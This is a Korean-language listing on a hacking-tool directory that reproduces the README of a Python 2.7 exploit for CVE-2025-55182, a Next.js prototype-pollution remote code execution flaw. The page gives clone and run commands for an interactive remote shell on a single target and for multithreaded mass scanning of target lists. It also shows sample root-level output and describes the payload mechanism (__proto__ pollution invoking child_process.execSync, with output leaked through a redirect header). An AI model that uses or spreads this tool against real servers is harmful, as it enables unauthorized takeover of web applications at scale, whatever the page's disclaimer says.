Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-React2shell — CVE-2025-55182 익스플로잇 도구 – Next.js 프로토타입 오염으로 인한 RCE를 위한 Python 2.7 익스플로잇 | Kitploit
도구/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

CVE-2025-55182 익스플로잇 도구 – Next.js 프로토타입 오염으로 인한 RCE를 위한 Python 2.7 익스플로잇

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
612개월 전아직 검토되지 않음

CVE-2025-55182 - React2shell

CVE-2025-55182에 대한 Python 2.7 익스플로잇 – Next.js 애플리케이션의 치명적인 프로토타입 오염 / RCE 취약점입니다.
이 도구는 단일 대상 대화형 셸과 다중 호스트의 대규모 스캔을 모두 지원하며, 멀티스레딩, 컬러풀 출력, 자동 HTTPS 폴백을 제공합니다.


🚀 기능

  • ✅ 단일 대상 대화형 셸 – 임의의 시스템 명령 실행
  • ✅ 파일 목록에서 대량 스캔 – 멀티스레드, 빠름, 결과 자동 저장
  • ✅ 자동 감지 – 단일 URL → 셸 모드, 기존 파일 → 대량 스캔 모드
  • ✅ 자동 HTTPS – 프로토콜이 없으면 https:// 자동 추가
  • ✅ 스레드 안전 파일 쓰기 – 취약한 결과를 실시간으로 저장
  • ✅ 사용자 정의 명령 – 기본 id를 원하는 명령(whoami, ls 등)으로 변경 가능
  • ✅ 외부 종속성 없음 – requests만 필요 (쉽게 설치 가능)

📋 요구 사항

  • Python 2.7 (도구는 Python 2.7용으로 특별히 작성됨)
  • requests 라이브러리 – 다음 명령으로 설치:
    root@kitploit:~
    pip install requests
    

  • ANSI 색상을 지원하는 터미널 (대부분의 Linux/macOS 터미널, Windows Terminal, PowerShell)

📦 설치

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

스크립트를 실행 가능하게 만듭니다 (선택 사항):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 사용법

1. 대화형 셸 (단일 대상)

root@kitploit:~
python2 CVE-2025-55182.py https://target.com

또는 프로토콜 없이 (HTTPS가 자동으로 추가됨):

root@kitploit:~
python2 CVE-2025-55182.py target.com

연결 및 취약 확인 후 셸 프롬프트가 나타납니다:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

내장 명령어:

  • exit / quit – 셸 종료
  • clear – 화면 지우기
  • help – 도움말 표시

2. 대량 스캔 (대상 목록)

한 줄에 하나의 대상이 있는 파일을 준비합니다 (http/https 포함 또는 미포함):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

대량 스캔 실행 (기본값: 10개 스레드, 명령어 id, 출력 파일 res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

스레드, 명령어, 출력 파일 사용자 정의:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
  • 20 – 스레드 수
  • whoami – 각 취약 대상에서 실행할 명령어
  • results.txt – 출력 파일 (취약한 항목만 저장)

대량 스캔 출력 예시:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

저장된 결과 (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 작동 원리

이 익스플로잇은 Next.js 엔드포인트(/login, 경로가 비어 있으면 추가됨)에 조작된 multipart/form-data 요청을 보냅니다. 프로토타입 오염(__proto__:then 및 constructor:constructor)을 악용하여 child_process.execSync()를 사용해 시스템 명령을 실행하는 악성 접두사를 주입합니다.

서버는 x-action-redirect 헤더(또는 Location)에 명령 출력을 포함한 303 리디렉션으로 응답합니다. 도구는 /login?a=<output>에서 결과를 추출합니다.


🛡️ 면책 조항

이 도구는 교육 목적과 공인된 보안 테스트 전용으로 제작되었습니다. 승인되지 않은 시스템 접근은 불법입니다. 저자는 이 소프트웨어의 오용이나 손해에 대해 어떠한 책임도 지지 않습니다. 이 익스플로잇을 사용하기 전에 대상 시스템 소유자의 명시적인 서면 허가를 받아야 합니다.

더 자세한 면책 조항은 Jenderal92의 표지에서 확인할 수 있습니다. 여기를 확인하세요!!!

도구 다운로드